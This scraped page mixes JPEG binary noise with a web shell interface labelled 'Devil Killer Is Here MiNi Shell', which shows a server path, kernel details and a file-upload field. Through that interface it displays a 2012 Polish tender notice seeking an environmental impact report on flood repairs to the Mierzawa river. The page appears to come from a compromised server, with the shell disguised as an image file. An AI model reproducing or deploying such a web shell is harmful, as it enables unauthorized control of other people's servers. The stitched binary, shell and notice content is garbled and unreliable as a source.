JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120622/136075-N-2012.html

<p class="kh_header"><b>Kielce: opracowanie raportu o oddziaływaniu na środowisko przedsięwzięcia p.n. Usuwanie szkód powodziowych na rzece Mierzawie w km 52+850 - 55+350 w m. Krzelów, Białowieża i w km 37+000 - 40+490 w m. Sędziszów, gm. Sędziszów</b><br>
<b>Numer ogłoszenia: 136075 - 2012; data zamieszczenia: 22.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie raportu o oddziaływaniu na środowisko przedsięwzięcia p.n. Usuwanie szkód powodziowych na rzece Mierzawie w km 52+850 - 55+350 w m. Krzelów, Białowieża i w km 37+000 - 40+490 w m. Sędziszów, gm. Sędziszów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia. 1.1	Przedmiotem zamówienia jest wykonanie usługi polegającej na sporządzeniu raportu o oddziaływaniu przedsięwzięcia na środowisko dla prac pod nazwą: Usuwanie szkód powodziowych na rzece Mierzawie w km 52+850-55+350 w miejscowości Krzelów, Białowieża i w km 37+000-40+490 w miejscowości Sędziszów, gmina Sędziszów.  Przedmiotowy raport  o oddziaływaniu przedsięwzięcia na środowisko  zwany dalej raportem zostanie opracowany dla potrzeb uzyskania przez Zamawiającego decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia dla zadania pod nazwą: Usuwanie szkód powodziowych na rzece Mierzawie w km 52+850-55+350 w miejscowości Krzelów, Białowieża i w km 37+000-40+490 w miejscowości Sędziszów, gmina Sędziszów. Zakres przewidywanych, prac dla których zostanie opracowany raport związanych z usuwaniem szkód powodziowych na rzece Mierzawie zawiera załączone postanowienie Burmistrza Sędziszowa z dnia 14 października 2011 r. znak: OŚ.6220.I.6.2011. - zał. nr 7 do SIWZ.  1.2	Wielkość oraz zakres przedmiotu zamówienia. - Raport powinien zawierać m.in.: -	charakterystykę planowanych prac na rzece i warunki użytkowania terenu w fazie realizacji i eksploatacji lub użytkowania, z uwzględnieniem podstawowych parametrów koryta rzeki przed i po realizacji prac na rzece, rzędne terenu po rozplantowaniu mas ziemnych, -	opis budowy hydrologicznej i hydrogeologicznej terenu będącego przedmiotem zamówienia, w tym charakterystyka związków wód podziemnych z wodami powierzchniowymi, -	analizę wpływu realizacji prac na przepływ rzeki Mierzawy (w tym spływu wielkich wód), rzędne lustra wody charakterystycznych przepływów, obiekty istniejące jak np. zbiorniki wodne, stawy hodowlane oraz mosty, -	analizę wpływu prac na skalę zmian stosunków wodnych na gruntach sąsiednich, -	analizę zgodności planowanych prac z celami środowiskowymi Plan gospodarowania wodami na obszarze dorzecza Wisły, -	opis zjawisk i procesów antropogenicznych występujących na przedmiotowym terenie i w jego sąsiedztwie wraz z oceną wielkości ich wpływu na rzekę Mierzawę oraz opis zagospodarowania rzeki i jej doliny po wykonaniu konserwacji rzeki, w szczególności do możliwości intensyfikacji produkcji rolnej, a co za tym idzie możliwości wzrostu zanieczyszczenia rzeki. Podobnej analizy dokonać należy także pod kątem gospodarki rybackiej w rzece, w szczególności odnieść się do możliwości zmian ilościowych i gatunkowych w populacjach ryb, które mogą być żywicielami minogów, -	pokrycie szatą roślinną terenu realizacji prac, ze szczególnym uwzględnieniem gatunków chronionych rosnących w rzece i w jej dolinie, -	spis na terenie oddziaływania planowanych prac, występujących w rzece i jej dolinie zwierząt, ze szczególnym uwzględnieniem gatunków chronionych, -	spis na terenie oddziaływania prac występujących w dolinie rzeki grzybów, w tym gatunków chronionych, -	opis stanu zachowania i funkcjonowania ww. elementów przyrodniczych oraz ocena wpływu planowanych prac na ich funkcjonowanie i zachowanie, -	wyniki badania  dotychczasowego zakresu funkcjonowania korytarza ekologicznego jakim jest rzeka i jej dolina wraz z oceną wpływu planowanych działań na jego funkcjonowanie, szczególnie chronione gatunki i obszar chronionego krajobrazu, -	opis i ocena wpływu prac na funkcjonowanie zależnych obszarów Natura 2000 (Dolina Mierzawy i Dolina Górnej Mierzawy) i przedmioty ich ochrony, ze szczególnym uwzględnieniem powiązania tych obszarów, -	opis działań zapobiegających negatywnemu wpływowi planowanych działań na środowisko i/lub opis działań minimalizujących wpływ zamierzonego działania na występujące cenne walory przyrodnicze, -	przewidywane rodzaje i ilości zanieczyszczeń na etapie realizacji jak i eksploatacji wynikające z ewentualnych działań konserwacyjnych (określić częstotliwość) tj. odpady (według kodów) ze szczególnym uwzględnieniem odpadów niebezpiecznych oraz bilansu mas ziemnych, w tym określić sposób ich zagospodarowania mając na uwadze zachowanie wartości przyrodniczych oraz zakazy zmiany stanów wód wpływających szkodliwie na grunty sąsiednie. Przedstawić sposób prowadzenia prac, rozwiązania minimalizujące oddziaływanie związane z lokalizacją i uciążliwość w zakresie hałasu i zanieczyszczeń do powietrza. Ponadto podać termin realizacji prac konserwacyjnych, które powinny być ściśle dopasowane do warunków przyrodniczych i biologii gatunków chronionych występujących na terenie wykonywania zadania oraz w sąsiedztwie,
-	opis analizowanych wariantów: wariantu proponowanego przez Wnioskodawcę, racjonalnego wariantu alternatywnego oraz wariantu najkorzystniejszego dla środowiska m.in. gruntowo-wodnego i przyrody żywej, w tym obszarów Natura 2000, wraz z uzasadnieniem ich wyboru,
-	analizę możliwości wystąpienia kumulowania się oddziaływań prac ze szczególnym zwróceniem uwagi na spływ fali powodziowej,
-	analizę wpływu konserwacji rzeki na lokalny krajobraz,
-	analizę dotyczącą możliwych konfliktów społecznych związanych z planowanymi pracami,
-	określenie minimalnej częstotliwości prowadzenia niezbędnych prac utrzymaniowych na w/w odcinku, przy której zapewnione zostaną warunki dla swobodnego przepływu wody w korycie rzeki, 
Powyższe zagadnienia Wykonawca przedstawi w formie pisemnej i kartograficznej 
w skali odpowiadającej przedmiotowi i szczegółowości analizowanych zagadnień. Ponadto na czytelny podkład z map ewidencyjnych z zaznaczoną formą zagospodarowania należy nanieść obszar, na którym realizowane będzie zadanie z zaznaczeniem obszaru oddziaływania. 
Załącznik graficzny winien zawierać przekroje poprzeczne oraz przekrój podłużny koryta rzeki przed realizacją prac (przekroje poprzeczne należy wykonać co 100 m). Raport powinien zawierać klauzulę stwierdzającą kompletność opracowania, przydatność celowi, jakiemu ma służyć oraz wykonanie raportu zgodnie z obowiązującymi przepisami. Raport o oddziaływaniu przedsięwzięcia na środowisko o którym mowa powyżej powinien spełniać wymogi art. 66 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008r. Nr 199, poz. 1227 ze zm.) oraz być zgodny z zakresem ustalonym postanowieniem Burmistrza Sędziszowa z dnia 14 października 2011 r. (znak:OŚ.6220.I.6.2011),. Raport powinien uwzględniać wszystkie wymagania na dzień przekazania go Zamawiającemu i być zgodny z zapisami, w tym m.in.:
-	ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80 poz.. 717),
-	ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2010 r. Nr 243 poz. 1623 z pózn. zm.),
-	ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25 poz. 150),
-	ustawy z dnia 18 lipca 2001 r. Prawo wodne (t.j. Dz. U. z 2012 r. Nr 0, poz. 145),
-	ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz. U. z 2009 r., Nr 151, poz. 1220 ze zm.),
-	art. 4.7 Ramowej Dyrektywy Wodnej wraz ze spełnieniem wytycznych do ocen wpływu/oddziaływania przedsięwzięcia na cele ochrony wód w rozumieniu art. 4.1 dyrektywy. 2.2. Obowiązkiem Wykonawcy jest także: - przedstawienie Zamawiającemu wstępnej koncepcji raportu w początkowej fazie jego  sporządzania, - Nadzór autora raportu min. dwa razy w tygodniu na etapie realizacji prac, - Monitoring wykonawczy i powykonawczy przez okres 3 lata po zakończeniu prac, jeden raz na rok, - uwzględnienie sugestii, wytycznych i uwag Zamawiającego, w zakresie wykonywanego raportu. Wykonawca  będzie zobowiązany do uwzględniania w opracowaniu sugestii, wytycznych i uwag Zamawiającego w terminie do 7 dni.__ 3. Termin wykonania całego zamówienia: do 28-09-2012 r. (termin do dnia 28-09-2012 r. obejmuje protokolarne przekazanie raportu Zamawiającemu).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.70.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 1 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonania w ciągu ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: - co najmniej dwóch usług w zakresie opracowania raportu o oddziaływaniu na środowisko spełniającego wymogi art. 66 Ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008 r. Nr 199, poz. 1227 ze zm.) dla przedsięwzięcia obejmującego swym oddziaływaniem dolinę rzeczną, w tym co najmniej jednej usługi polegającej na opracowaniu raportu w podanym wyżej zakresie o wartości brutto nie mniejszej niż 60 tys. zł. 
Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty:  2. Sporządzony przez Wykonawcę wykaz prac w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i posiadania doświadczenia  we wzorze stanowiącym załącznik nr 2 do SIWZ. W wykazie tym należy potwierdzić spełnienie warunków określonych w pkt.1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał. 3. Dokumenty potwierdzające, że prace przedstawione w wykazie  zrealizowanych zadań zostały wykonane należycie, np. referencje. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ     Wymagana forma dokumentu - oryginał. 2.	Oświadczenie z art. 36 ust. 4 ustawy we wzorze określonym w załączniku nr 5 do SIWZ. Wymagana forma dokumentu - oryginał. 3.	Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w zakresie oferty Wykonawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 4.	Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzielenie zamówienia, o którym mowa w rozdz. IX SIWZ. Forma dokumentu oryginał lub kopia poświadczona notarialnie. 5.	W przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć kserokopię umowy spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników lub pełnomocnika ( wspólnika) umocowanego do takiej czynności. Warunek nie ma zastosowania w odniesieniu do spółek jawnych w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru - Krajowego Rejestru Sądowego, jeżeli ujawniono w nim wspólników spółki, oraz sposób reprezentowania spółki (składania oświadczeń woli)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy na warunkach §12 wzoru umowy stanowiącej załącznik nr 6 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com